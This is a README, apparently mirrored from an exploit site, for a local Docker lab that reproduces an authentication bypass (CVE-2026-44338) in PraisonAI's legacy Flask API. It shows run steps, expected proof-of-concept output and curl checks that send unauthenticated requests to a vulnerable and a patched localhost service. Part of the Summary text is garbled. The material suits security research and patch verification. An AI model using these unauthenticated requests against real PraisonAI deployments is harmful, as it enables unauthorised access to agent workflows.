Share
## https://sploitus.com/exploit?id=5C9F040D-4B80-54FA-ACFB-3DEFEE20F072
# CVE-2026-44338 PraisonAI Authentication Bypass Lab
Local Docker lab for CVE-2026-44338, an authentication bypass in PraisonAI's legacy Flask API server.
This lab demonstrates the unauthenticated access condition on the legacy API routes. It intentionally uses a safe route-level reproduction instead of a full PraisonAI deployment, so the proof stays focused on the authentication flaw and does not trigger real agent workflows or external LLM calls.
## Summary
CVE-2026-44338 affects PraisonAI versions `>= 2.5.6` and ` auth disabled by default, unauthenticated requests return 200
patched -> auth required by default, unauthenticated requests return 401
```
## Lab Design
The lab contains two local services:
| Service | URL | Behavior |
| --------- | ----------------------- | --------------------------------------------- |
| `vuln` | `http://127.0.0.1:8081` | Reproduces vulnerable fail-open auth behavior |
| `patched` | `http://127.0.0.1:8082` | Requires bearer-token authentication |
Both services are bound to `127.0.0.1` only.
The `/chat` route uses a dummy runner instead of a real PraisonAI workflow. This provides observable proof that the unauthenticated request reaches the workflow trigger path without causing external side effects.
## Repository Structure
```text
.
โโโ docker-compose.yml
โโโ vuln
โ โโโ Dockerfile
โ โโโ start_server.py
โโโ patched
โ โโโ Dockerfile
โ โโโ start_server.py
โโโ poc
โ โโโ poc.py
โโโ .gitignore
โโโ README.md
```
## Run
```bash
docker compose up --build -d
python3 poc/poc.py
```
## Expected Result
The vulnerable service allows unauthenticated access:
```text
=== vuln ===
[unauthenticated] GET /agents
status: 200
[unauthenticated] POST /chat
status: 200
verdict: LIKELY_VULNERABLE
```
The patched service blocks unauthenticated access:
```text
=== patched ===
[unauthenticated] GET /agents
status: 401
[unauthenticated] POST /chat
status: 401
verdict: NOT_VULNERABLE_OR_PROTECTED
```
Final expected summary:
```text
vuln: LIKELY_VULNERABLE
patched: NOT_VULNERABLE_OR_PROTECTED
```
## Manual Verification
Check the vulnerable route:
```bash
curl -i http://127.0.0.1:8081/agents
```
Expected vulnerable response:
```text
HTTP/1.1 200 OK
```
Check the patched route:
```bash
curl -i http://127.0.0.1:8082/agents
```
Expected patched response:
```text
HTTP/1.1 401 UNAUTHORIZED
```
Server logs should show the difference clearly:
```text
vuln: "GET /agents HTTP/1.1" 200
patched: "GET /agents HTTP/1.1" 401
```
## Cleanup
```bash
docker compose down -v
```
## Safety Notes
This lab is intended for local security research only.
The PoC does not:
* execute shell commands
* use real API keys
* call external LLM providers
* scan external networks
* trigger real PraisonAI agent workflows
## References
* GitHub Advisory: GHSA-6rmh-7xcm-cpxj
[https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj](https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj)
* NVD: CVE-2026-44338
[https://nvd.nist.gov/vuln/detail/CVE-2026-44338](https://nvd.nist.gov/vuln/detail/CVE-2026-44338)
* OSV: GHSA-6rmh-7xcm-cpxj
[https://osv.dev/vulnerability/GHSA-6rmh-7xcm-cpxj](https://osv.dev/vulnerability/GHSA-6rmh-7xcm-cpxj)
* Vulnerable source: PraisonAI `v4.6.33` `src/praisonai/api_server.py`
[https://raw.githubusercontent.com/MervinPraison/PraisonAI/v4.6.33/src/praisonai/api_server.py](https://raw.githubusercontent.com/MervinPraison/PraisonAI/v4.6.33/src/praisonai/api_server.py)
* Patched source: PraisonAI `v4.6.34` `src/praisonai/api_server.py`
[https://raw.githubusercontent.com/MervinPraison/PraisonAI/v4.6.34/src/praisonai/api_server.py](https://raw.githubusercontent.com/MervinPraison/PraisonAI/v4.6.34/src/praisonai/api_server.py)